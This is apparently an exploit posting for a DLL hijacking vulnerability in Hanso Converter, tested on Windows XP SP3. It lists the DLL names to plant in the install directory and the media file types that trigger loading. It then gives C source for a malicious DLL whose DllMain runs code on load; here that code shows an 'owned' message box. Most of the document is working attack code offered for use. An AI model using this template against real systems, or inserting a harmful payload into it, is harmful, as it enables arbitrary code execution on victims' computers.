/* #Hanso Converter DLL Hijacking Exploit #Author : anT!-Tr0J4n #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends #special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Software : http://www.hansotools.com/applications/hanso-converter.html #Tested on: Windows XP sp3 ========================== [>>] Compile code as + unicows.dll + id3lib.dll + eupdate.dll + wnaspi32.dll [>>] Move DLL file to the directory where Hanso Converter is installed [>>] check the result --> 0wn33d [>>]exploit.flac [>>]exploit.wav [>>]exploit.m4a [>>]exploit.wma [>>]exploit.mp4 [>>]exploit.ogg [>>]exploit.aac [>>]exploit.aif [>>]exploit.aiff [>>]exploit.voc [>>]exploit.au ========================== + unicows.dll + id3lib.dll + eupdate.dll + wnaspi32.dll (code) */ #include "stdafx.h" void init() { MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }